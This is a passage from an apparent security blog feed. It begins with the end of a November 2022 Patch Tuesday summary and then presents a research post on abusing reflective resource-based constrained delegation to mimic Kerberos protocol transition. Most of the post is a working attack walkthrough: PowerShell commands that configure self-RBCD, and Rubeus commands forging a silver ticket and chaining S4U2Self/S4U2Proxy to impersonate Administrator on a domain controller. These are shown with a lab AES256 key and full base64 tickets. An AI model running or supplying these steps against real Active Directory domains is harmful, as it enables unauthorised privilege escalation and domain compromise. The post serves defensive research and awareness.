Four total Security Feature Bypass bugs are getting fixed this month, including the patch for the MoW bug being actively exploited. There’s another fix for a MoW bug, but this one is not listed as under active attack. The fix for Excel addresses a bug that would bypass the content check in the INDIRECT function. More notably, the bug in BitLocker could allow an attacker with physical access to bypass the Device Encryption feature and access the encrypted data. Preventing this is pretty much the “one job” of Device Encryption, so regardless of exploitability, this is a significant bypass.

Today’s release also includes fixes for five additional DoS bugs. Four of these impact network protocols: PPTP, RADIUS, and Network Address Translation (NAT). A successful attack on one of these protocols would cause the service to stop responding. The same is true of the bug in Kerberos, which could impact logging on and other functionality that relies on the Kerberos service.

There is one spoofing bug in SharePoint server, but beyond the authentication requirement, there’s no information regarding the exploit scenario.

Finally, you may have heard of some OpenSSL bugs that had everyone abuzz before their release. To say they fizzled out is a bit of an understatement. Still, the fixes for Microsoft products are included in this release.

There is one new advisory this month adding defense-in-depth functionality to Microsoft Office. The new feature provides hardening around IRM-protected documents to ensure the trust-of-certificate chain. The latest servicing stack updates can be found in the revised ADV990001.

Looking Ahead

The final Patch Tuesday of 2022 will be on December 13, and we’ll return with details and patch analysis then. Be sure to catch the Patch Report webcast on our YouTube channel. It should be posted in just a few hours. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

The November 2022 Security Update Review

How to mimic Kerberos protocol transition using reflective RBCD

7 November 2022 at 16:59

As I am often looking for misconfigurations dealing with Kerberos delegation, I realize that I was missing an interesting element while playing with the Kerberos protocol extensions S4U2Self and S4U2Proxy. We know that a delegation is dangerous if an account allows delegating third-party user authentication to a privileged resource. In the case of constrained delegation, all it takes is to find a privileged account in one of the SPN (Service Principal Name) set in the msDS-AllowedToDelegateTo attribute of a compromised service account.

I asked myself whether it’s possible to exploit a case of constrained delegation without protocol transition since the S4U2Self does not provide valid “evidence” as we will see. Is there a way to mimic the protocol transition?

Even if i read quite a few articles dealing with Kerberos delegation, i realized that it was the crusade of Elad Shamir’s research Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory, and that the answer stands in what is called Reflective Resource-Based Constrained Delegation (Reflective RBCD).

While Reflective RBCD is not a new technique and as this technique does not command high visibility in Google searches, I thought it would be interesting to share with you my thoughts about mimicking protocol transition.

Kerberos Constrained Delegation

With the Kerberos constrained delegation, if a service account TestSvc has the attribute msDS-AllowedToDelegateTo set with an SPN targeting a service running under a privileged object — such as CIFS on a Domain Controller — TestSvc may impersonate an arbitrary user to authenticate to the service running in the security context of the privileged object — in this case, the DC — which is very dangerous.

Delegating to a domain controller

However, in order to exploit the Kerberos constrained delegation, the literature usually says that we also need the protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION set on TestSvc) to generate a forwardable service ticket for ourselves (S4U2Self) and to pass it to the S4U2Proxy, which requests another new service ticket to access our privileged object. Here, the protocol transition (S4U2Self) is required to impersonate an arbitrary user.

This makes us wonder if there’s a way to exploit the constrained delegation — assuming the service account is compromised — without protocol transition? More importantly, is there a way to impersonate any user without the protocol transition? And if not, why?

Environment setup

TestSvc is our compromised service account;

  • It is unprivileged, being only member of the Domain Users group
  • It has an SPN, required for delegating
  • It can also delegate to the domain controller DC01
PS J:\> New-ADUser -Name "TestSvc" -SamAccountName TestSvc -DisplayName "TestSvc" -Path "CN=Users,DC=alsid,DC=corp" -AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) -Enabled $True -PasswordNeverExpires $true -ChangePasswordAtLogon $false
PS J:\> Set-ADUser -Identity TestSvc -Replace @{"servicePrincipalName" = "MSSQLSvc/whatever.alsid.corp" }
PS J:\> Set-ADUser -Identity TestSvc -Add @{'msDS-AllowedToDelegateTo'[email protected]('HOST/DC01.ALSID.CORP')}

Service Ticket as an evidence

Since the protocol transition uses S4U2Self to get a valid service ticket for ourselves and use it as “evidence” for S4U2Proxy, our first thought might be whether we can forge this ticket on our own. Since we compromised TestSvc, we know its secret, which leads us to think that it’s possible to forge this service ticket in theory.

And yet we fail to forge a ticket for an arbitrary user and pass it to S4U2Proxy.

The first step consists in forging the service ticket to use as evidence (040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 is the aes256 key of the TestSvc service account, MSSQLSvc/whatever.alsid.corp is the SPN requested, held by TestSvc itself):

.\Rubeus.exe silver /service:MSSQLSvc/whatever.alsid.corp /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /user:alsid.corp\Administrator /ldap /domain:alsid.corp /flags:forwardable /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.1.1

[*] Action: Build TGS
...
[*] Building PAC
...
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'MSSQLSvc/whatever.alsid.corp'
...
[*] base64(ticket.kirbi):
doIFczCCBW+gAwIBBaEDAgEWooIEWTCCBFVhggRRMIIETaADAgEFoQwbCkFMU0lELkNPUlCiKjAooAMCAQKhITAfGwhNU1NRTFN2YxsTd2hhdGV2ZXIuYWxzaWQuY29ycKOCBAowggQGoAMCARKhAwIBA6KCA/gEggP0Jl2zxQ1VVoWL2iPIENC0NHefQx1D+wUsczCQLL3CrHqjpq16D/n0YFf5uqrLPuC6oIphRbbIRCmVO8cN2h8X9/ZFNBdqJmW9k8OrByGlpwWQ51hg3WgVp24zJuqX3YTHZxQ5H1n6+8KkaqH9rUrz+WK52vdihN6xbHdX0U2zkb6iE4YfvZk9KX9daDqlRhE5P6i/D+oxda4A5BrLXOvBxMDY0E6PPNfkwLXfsc0MWo9/ZutfdGC4t1onKELY2WZ27/iyR0Ng/D9LQ7mCyPAjFkTR2nS1vUJz3Ae4omIKaaOBbN+e/X6cyTjBCLWUzecX2Xy+2wu1x4BP62mrQ9T73IByeeavC+3z2Lygig5Fx18UvJbPP9E3gFBF9/3PJK0rOMqFKbojAEDF+XLVMfE+T8/rNNMB6VH5ReoQbG+OuUEaAlcBPoWlAxrcPznE3kRkbB1KqiJHGMiMgQqVIGJt9zZxblcY+mHC3Pbw1v7G+t9YnF2dalbdicC+eWSoQydbv10spX5h89BQ/PgVL0vTGnFs9fzYT6NibIJcot3MgBnruGVK7OhK8w9Bv56aZ6NQXkj+ttGK6NrS0T3B8lnX23PRJqiu5eQ4NIR2w618LkOJSLcqM99EKQmfqhUJwsqLWDf3Q/IMBHXOtgKi7ZtvruCO12qJbdOYh+K1nLfnlwq/qNNs9HQtAqCgWlpoOb4tpfRI/A12a3hCgVSd0kPbsqHpBtfh8d0yJGsl8SJiMfMJB5hdJO4uXiP+9AEQrGAx7yUQ9bKmEVlSXXYC/LT2Posi/254uZEX3C6W0UGoAVqB0a9GPGnu32pt5ulagp9i/5c4OnmSLqXRXrmb4rlEETl/f5bOpegVdknk20Mg17jyhPDbxNNfMOfYPXd0k+WPbMBFK9Lol6GEPY1n6CLp5c4TaG6XZk3A+mYmvHEazxZjfKC1PR+GmnF7AJPkVbLSvh23YpMphjf6g5Fu/ohbshTL7tUB13uEMgH1EpWXvdG349r9t+Nosw9iGRxbKIwyRnZMOK16DHu70ETNjt4gRNf2KLwSsfYB2dg6crKvH1deWeFDH5OgpNGlAroSTIbW+swyrquK20lYDTkMYIPdaKTQqwUA19ol3X8PWJDgdKJfO264q9y3phJufUkqYSzifMueTvGup9IxqQnt6CsW1RBqYTFkYddQ2uTi40hmaJVeKYw/WPOAv38AYbwwl4OVptxsRyq2Ts07LRWYFJfvc6Ol9hK2TAR4S9C+splESMHYLatpbTFj58OWp6AVw/SwKuSvU5JEh3B5WIMkdWPouD8MrsTKJ5T1JU5J1a72k4l3h8TCi/tRp42DudvDhAxDEGg5m6OCAQQwggEAoAMCAQCigfgEgfV9gfIwge+ggewwgekwgeagKzApoAMCARKhIgQgdPMmPJpSNbnt8crSu95aBGTGbz32W45+wH3zl9OIr9ihDBsKQUxTSUQuQ09SUKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEAAAACkERgPMjAyMjExMDIwOTMwMDBapREYDzIwMjIxMTAyMDkzMDAwWqYRGA8yMDIyMTEwMjE5MzAwMFqnERgPMjAyMjExMDkwOTMwMDBaqAwbCkFMU0lELkNPUlCpKjAooAMCAQKhITAfGwhNU1NRTFN2YxsTd2hhdGV2ZXIuYWxzaWQuY29ycA==

Next, we use this evidence for the S4U2Proxy request:

.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /msdsspn:HOST/DC01.ALSID.CORP /altservice:CIFS /tgs:<previously_forged_b64_service_ticket>
...
[*] Action: S4U

[*] Loaded a TGS for ALSID.CORP\Administrator
[*] Impersonating user 'Administrator' to target SPN 'HOST/DC01.ALSID.CORP'
[*] Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/DC01.ALSID.CORP'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2proxy request to domain controller 192.168.199.2:88

[X] KRB-ERROR (41) : KRB_AP_ERR_MODIFIED

The S4U2Proxy rejected our forged service ticket with the error KRB_AP_ERR_MODIFIED due to a PAC (Privilege Attribute Certificate) validation issue, as seen below:

KRB_AP_ERR_MODIFIED error in Wireshark

By the way, if you’re looking for information on decrypting encrypted data stub in Kerberos exchanges, check out Decrypt Kerberos/NTLM “encrypted stub data” in Wireshark by Clément Notin [Tenable].

According to Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory:

The problem with silver tickets is that, when forged, they do not have a PAC with a valid KDC signature. If the target host is configured to validate KDC PAC Signature, the silver ticket will not work. There may also be other security solutions that can detect silver ticket usage.

In fact, before CVE-2020–17049 (Kerberos Bronze Bit Attack), an attacker who owned a service account, was able to forge the missing FORWADABLE flag of a service ticket and passed it successfully to the S4U2Proxy protocol extension.

Also, according to CVE-2020–17049: Kerberos Bronze Bit Attack — Theory:

Later when the KDC receives the service ticket during the S4U2proxy exchange, the KDC can validate all three signatures to confirm that the PAC and the service ticket have not been modified. If the service ticket is modified (for example, if the forwardable bit has changed), the KDC will detect the change and reject the request with an error such as “KRB_AP_ERR_MODIFIED(Message stream modified).”

Note that, since KB4598347 (CVE-2020–17049), the KDC no longer checks the forwadable flag as we will see.

Reflective RBCD

If we control TestSvc, it means that we can set the RBCD (Resource-based Constrained Delegation) on this object since we have full control over it.

RBCD only needs the permission to write an attribute (msDS-AllowedToActOnBehalfOfOtherIdentity), instead of msDS-AllowedToDelegateTo (classical constrained delegation) which needs to be a domain administrator. More precisely, to set the msDS-AllowedToDelegateTo attribute, the SeEnableDelegationPrivilege privilege is required and is granted to the “Domain Local’’ group Administrators (see the security policies in the Default Domain Controllers Policy).

Note that the protocol transition — TRUSTED_TO_AUTH_FOR_DELEGATION UAC flag — also needs domain administrators privileges to be set.

Setting self RBCD:

PS J:\> whoami
alsid\TestSvc
PS J:\> Get-ADUser TestSvc -Properties msDS-AllowedToDelegateTo,servicePrincipalName,PrincipalsAllowedToDelegateToAccount,TrustedToAuthForDelegation

msDS-AllowedToDelegateTo : {HOST/DC01.ALSID.CORP}
servicePrincipalName : {MSSQLSvc/whatever.alsid.corp}
PrincipalsAllowedToDelegateToAccount : {}
TrustedToAuthForDelegation : False

PS J:\> Set-ADUser TestSvc -PrincipalsAllowedToDelegateToAccount TestSvc
PS J:\> Get-ADUser TestSvc -Properties PrincipalsAllowedToDelegateToAccount

PrincipalsAllowedToDelegateToAccount : {CN=TestSvc,CN=Users,DC=alsid,DC=corp}

Because without setting the protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION), the S4U2Self can’t provide successfully valid “evidence” (i.e. a service ticket) to the S4U2Proxy, the trick is to replace the S4U2Self — used for the protocol transition — with a reflective RBCD to execute an RBCD attack on ourselves.

But this time, as the Resource-based Constrained Delegation allows to perform a successful delegation (*), understanding allows an attacker to generate a valid service ticket impersonating an arbitrary user, we successfully reproduced somehow the protocol transition.

(*) The KDC only checks if the delegated user is OK to be delegated, meaning that it’s neither Protected Users nor flagged as sensitive, and set as trustee in the msds-AllowedToActOnBehalfOfOtherIdentity attribute.

Note: The msDS-AllowedToActOnBehalfOfOtherIdentity attribute used to configure RBCD is a security descriptor:

PS J:\> $account = Get-ADUser TestSvc -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
PS J:\> ConvertFrom-SddlString -Sddl $account."msDS-AllowedToActOnBehalfOfOtherIdentity".Sddl
Owner            : BUILTIN\Administrators
Group :
DiscretionaryAcl : {ALSID\TestSvc: AccessAllowed (ChangePermissions, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ExecuteKey, FullControl, GenericAll, GenericExecute, GenericRead, GenericWrite, ListDirectory, Modify, Read, ReadAndExecute, ReadAttributes, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, Write, WriteAttributes, WriteData, WriteExtendedAttributes, WriteKey)}
SystemAcl : {}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor

Finally, we have (S4U2Self + S4U2Proxy) + extra S4U2Proxy, where (S4U2Self + S4U2Proxy) is the reflective RBCD.

Mimicking Kerberos protocol transition

Here are the detailed steps:

  • S4U2Self without TRUSTED_TO_AUTH_FOR_DELEGATION;

The service ticket is for an arbitrary user and it is not forwardable. With regard to RBCD, this is not an issue because a forwarded ticket will be accepted by the S4U2Proxy. In fact nowadays this is not really accurate as, since KB4598347, the KDC no longer checks the forwadable flag to avoid blindly trusting the PAC in case of PAC forgery. Moreover, in the case of the Resource-Based Constrained Delegation, the KDC only checks if the delegated user is OK to be delegated (i.e. not Protected Users, not NOT_DELEGATED) and if the delegating resource (TestSvc) is set as a trustee in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

  • S4U2Proxy;

We get a forwardable service ticket for ourselves (see setting self RBCD above) to use as evidence for the next S4U2Proxy.

  • S4U2Proxy (again);

We just tricked our way into getting a valid evidence. Now we can request a service ticket this time for a service running under the privileged object set in msDS-AllowedToDelegateTo (classic constrained delegation).

In practice, we have:

J:\>klist

Current LogonId is 0x1:0x7a919ebc

Cached Tickets: (1)

#0> Client: TestSvc @ ALSID.CORP
Server: krbtgt/ALSID.CORP @ ALSID.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/8/2022 11:54:43 (local)
End Time: 7/8/2022 21:54:43 (local)
Renew Time: 7/15/2022 11:54:43 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC01

J:\>dir \\DC01.ALSID.CORP\C$
Access is denied.

J:\>.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /domain:alsid.corp /msdsspn:MSSQLSvc/whatever.alsid.corp /impersonateuser:Administrator /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.1.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605
[*] Building AS-REQ (w/ preauth) for: 'alsid.corp\TestSvc'
[*] Using domain controller: 192.168.199.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFBjCCBQKgAwIBBaEDAgEWooIEETCCBA1hggQJMIIEBaADAgEFoQwbCkFMU0lELkNPUlCiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmFsc2lkLmNvcnCjggPNMIIDyaADAgESoQMCAQKiggO7BIIDtziDJUKhpiQpBW+Oy/6eKHq02Vu45cBGNu2TK3FfRPvL4yLgXup/afyy9YR9KLmJ0FaBM4Y5r69LKhYvISsWO7uqjtL3dzI+PcbpvRWzNgqtGyeQ9OVf5nrdVphQOE8X2PnxZ9Dbpg087c2wsiZaK1P9PYkLl3hQlA0aw29PobVC+WmjPo7nALWjMdHvPEILNBAGRsstIdAfB5zzAQQehxDs1E8XNf6S3xsNBk1n11BWSgc9FJixwebBFIt18ZnsPFAH/fIac9sWaY2NBhBRUSdmU8OtGqb3X527sy6hMfyNkTQeT3MEF72jiH/CqBJNDQ09yvETAwRX5p8VgExjhSqFbtl6HzQYxySXGyXxwpGdSNBm2/w2XOJjhEiQwqVm0mabCEfPrUBpOEBN2OI2vus1U855o6TnXKuYExy6f6A9/JWR1q/RdA9f6PCM9oIoCZbPjdeCVh56N3j6WIZbSRorVzlXXKoxcOhtEC4ROqY9kRs1NpA+OHV5aD1k2ED6cfNDHe1zUKKdikSH2NKXk0Mr9lkzW59v4VKqnnKBYoI6t1Xn4lelYuDsoFchj+RbS/+jnwCAA0uRl8QOGYr0/uHCpSGllE1YnfKfJJKnhs2WvdsZmesgN61xGzMolFMZrR0oIJtAnz5P6QMwp6vMtymSJJCmIQ3j7s0blDggXxITB9iNDHLzVXCa9FP+DaMJDG8bgQt+UxMRNrQ/fIZZLz/GVV+tExnohpi+KjgYqA1G1MotMz5TFvJ2tsodmZx2sSRgbeZ+RqwGFRBeU/QBcLd80aTGCwO/EsL8aFo10UXGU8K68PUFi81F9d3H0dNxP3oaXhPGcE7dc1DCb9xlUXALubBbqsZ3fTm4T11fgiFzBILRatCl4XM3MDX6UfWgpwAAVAqPr3oh0c/ZLSp/HYJAVH+RM2GZ3GJ0QMocToQnCVUvHRmV39XBLgQd5jX3Tod8vrl209cjtjteDRK/8gw5+qhZ5kFcdlHRmS5s35Iz/z5Yo6HcyPi89TdHT8fP2zp8d+1GwE/L0gGWwnZmjEDwJWE3ImybxSIVbctFqWZ1MAQyMZh9wEpLYF5z8MdK6vcw9Uwnt3AL/zIyZrY9usoW3IEqfI0mCVVXTSzab2LZDpSzbYumyyLNaCKfK5k8EOQJ62fmwGaywDBBS19oCwhXPP7809ewjBGCb8jTBCIcoRI4lg45/u9bw97nTewHisiX5nj9TTDrdaLEa2AyilwYrLN9lC8H4i+hQXgwwI1R6PccY1EZ4KOB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoCswKaADAgESoSIEIFx7HgoNGnCa2ZGy4BdsnKiURRsgFfN8HnNgP6r2jIAzoQwbCkFMU0lELkNPUlCiFTAToAMCAQGhDDAKGwh0ZXN0dXNlcqMHAwUAQOEAAKURGA8yMDIyMDcwODA5MjQyMlqmERgPMjAyMjA3MDgxOTI0MjJapxEYDzIwMjIwNzE1MDkyNDIyWqgMGwpBTFNJRC5DT1JQqR8wHaADAgECoRYwFBsGa3JidGd0GwphbHNpZC5jb3Jw


[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2self request to 192.168.199.2:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIFWDCCBVSgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoQwbCkFMU0lELkNPUlCiFTAToAMCAQGhDDAKGwh0ZXN0dXNlcqOCBD4wggQ6oAMCARehAwIBBKKCBCwEggQodMExQsqVhou6aOvYkN1JZZv5bH8FfDUpTPySOqJhiSE9GegSXH1Lu5aTP4i7YLgdMg5WyUNECHrNxH80Gg+9on/4T265SVCivmgfSCkraQVMQ+2+ckDV4umf1ms4HXNCDRLmeapHWRAiapGYx4jMBAedZ7L3Jnw9TWCIF+ZbJ+QblfapXfhKPj9rJFI53mLYbrP9CPd1qGXd+FFQYRjOsigjNSfd7PqNc/GRS4slrumS8QjQjhldmUNVDi0TQvYupxY1oxiMqk7AAG83zbMSR/5Zq8XDR0yHNv5ZiHIfuVDL/AIEARrKKrRLSfllXyLjEtk5kRtukoIfSPhvyweVIruZn9puOr5+uSJxn7lxcfgLrT7MzE9BT/HDRHJeYholtDykG0tg1pfiKtXj/rekTKaPuuleNnrvoiDH/57SpHa42AXbnf9bSBqZcknnCz6n4Dk6MmWHr7pR//dVUl1ewlKBMb/WO90cEbyuqoDglOKf6yUzUlPxYBiVLjb+3hg+doZj/5pzm/2wLWUuN4IfpJ2kC3FgBRVKo1varXchSMTwuFMK1JWDJ+ZSKToFNa+5GDVcGy4mXG/a8gk1Q/QQt32+L6pGLwN3bItVIVjZzAQUlkJdoKYlv6rjHRdR3t1Z2bV3ol2jCkWcVKT3c6nLnBsUYUU3RfQenlCFT7/fNXVO2DUxBL6ugpiomvuywOTjvVFph+PMm9hZJMeCVVOqhvBoR3+4GzLAZJ4jvTjNTsQoV/as5mDxi+5/LHok1j64HbSVtn+FPzOymN+r4pKl/6E4JonCQxAN6Nv4RafhNvle3uFa2pNbr5X89MKJAxMAGgPTzoDsVLoS0iG6MvgjKHO3m6/G0fiFbuDLRFomq3ZON2gsnYd+X5RDrxuo0sZgmA6DJWB1v5hG4gJbcdan2G06aUMtx6zvVtc71Ke/+HAFqH274lPDF4uumESnFk7+PvHAy6akaLmCMSjAV6ufBwx/5zxlAd5fRblFylFqD2yyie+AauVjV8QIpHLvgK6RucTGwHQoBBZrdL9meLnsmaRdKMC5bX1Wb3Eek1de/nuOEt1rnVUFMG3WAgVLybv9SEsgRkgrWf4SzMysgXuf+/Jh52EKisHx8u08VfLKrShS5ApeETAMhu9BNgGYlj7fy77d1v7pWJGl40ICbslOsSQORCQXJKgDI9bms3XYfkL5wmchKFUVq2a8EUapL2VrQIcMYwyIFOuI8X6/LllsDDaX7GCPndOWTMO/0Ly+TGPM869nUI8ZyCQKiNPSlIrwkiMQs6HZC+JVvyw+e+lX0VQh6lay0GwNecOWdEXYA3ms9vdTR6uNSLDScvvzS4ywhVYkdKQm54W/+z0AeGd9DcURr4tjhPVi7A3Des5hcQ5Zhtim3u6ThPeDGlSroz0jvRdaUzYXtWWjgcswgcigAwIBAKKBwASBvX2BujCBt6CBtDCBsTCBrqAbMBmgAwIBF6ESBBC9HOonFiJahrI/emtNO+odoQwbCkFMU0lELkNPUlCiGjAYoAMCAQqhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjIwNzA4MDkyNDIyWqYRGA8yMDIyMDcwODE5MjQyMlqnERgPMjAyMjA3MTUwOTI0MjJaqAwbCkFMU0lELkNPUlCpFTAToAMCAQGhDDAKGwh0ZXN0dXNlcg==

[*] Impersonating user 'Administrator' to target SPN 'MSSQLSvc/whatever.alsid.corp'
[*] Building S4U2proxy request for service: 'MSSQLSvc/whatever.alsid.corp'
[*] Using domain controller: DC01.alsid.corp (192.168.199.2)
[*] Sending S4U2proxy request to domain controller 192.168.199.2:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'MSSQLSvc/whatever.alsid.corp':

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

First, we’ve done S4U2Self and S4U2Proxy. Now let’s ask for a service ticket for the domain controller. (Note: If you want to avoid a new AS-REQ request, you can pass the TestSvc TGT with the switch /ticket). The service ticket passed as argument (/tgs) is the result of the previous and final S4U2Proxy:

J:\>.\Rubeus.exe s4u /user:TestSvc /aes256:040f2dfbdc889c4139aef10cf7eb02c0ce5ab896efdb90248a1274b6decb4605 /msdsspn:HOST/DC01.ALSID.CORP /altservice:CIFS /ptt /nowrap /tgs:doIGOjCCBjagAwIBBaEDAgEWooIFRTCCBUFhggU9MIIFOaADAgEFoQwbCkFMU0lELkNPUlCiKjAooAMCAQKhITAfGwhNU1NRTFN2YxsTd2hhdGV2ZXIuYWxzaWQuY29ycKOCBPYwggTyoAMCARehAwIBBKKCBOQEggTgq5NVdJI8wTAxBUkYmiIsUNKI/BSYL/NWJN5nTG6A6WvdLJ8DcOHpVfeKXErzXgjt5frKOi8Jx20/LhJBrrQGSoD7iBsHYeRa8Y3u1YynZWVp8iwFJayL5LOHmWnruONVvgiZr5uzaykQI5TBP/9zyz5qRXeDdrLqS2pNKW5ANrg+bZ+Zdmh3HXrfRjeMUTIc0u8L0GPtfCQFlWtOhUKZ0SOaWDI3ASb2Ji3cDcjf2fHSqmw8+9/GTaGokDOV81iVK6mIB0z81jBMTqjk0V0s1P2U8hdn1lb/H6zINe+mm65uQUMVEExTTFncDjn6fmVm5bJU/kDnImDwhv/SNcj9vxmt82FnuKh+KrBb5JFdWqGeEw9IQWn67kV69Xt+yRtTFTctk5PM/vaBdOpOsoGG76kZ3pxmLZvM5w4iuP5zvkA9YF9VEpDFSqtcYQ8jwFSNTuNI2gfISojdBnRLqXsgqYOlGqtONAZBcwNT4SxOkFuwg6tATuxP8Kpl5YNzkazP7Nk05fg59DF+cV/5d1yvrZRAtHK0ewCwYVLYSni4pQXJj1UxD6UKJKmGzLdM8DgZ26/21XTngZe8Bpigme4mCTfO13ZsYivmxeZCZr3TS9hz1aqsEa5i+88MIivmXKYtQiEEBogYjGDzefNcZRxlFzFq/hRXkxZcyINyBmonSwKT8H4g7fogrJubUWlZB9paAicuOv6kCtNCCNCxGTzIhPkoYZ89XLHRaDbCnNBFX6siTidqJfbjejRifX2xnt37WVsFhivi16DhTb9hOrP+1Eus6ZtpTGlqX7TxZa9j57C8HRXaCfMQs3M+EwjaUf0yS/aXdjxpIxXIqy313ZhyKiHJGejctGHUoP5u7oroHwnWzT3sslygzVM+NRUV7eydIg4RDauwSkFNCHIFemHNUoDjVrQjrSLWaQyemadEagcEN0cQ8RrnPJ/2K8rtJm/QaH7CklRCO+yMn+A57ypm8MjQqMloYQoebtJFXSLrc2TsUw6peipqQBVE0PLLItEW8zaYDshXJh0I9yv/ZILSFw0pQGl7+ksbtKVBhRzM6GUT3bETfRlafhVw6N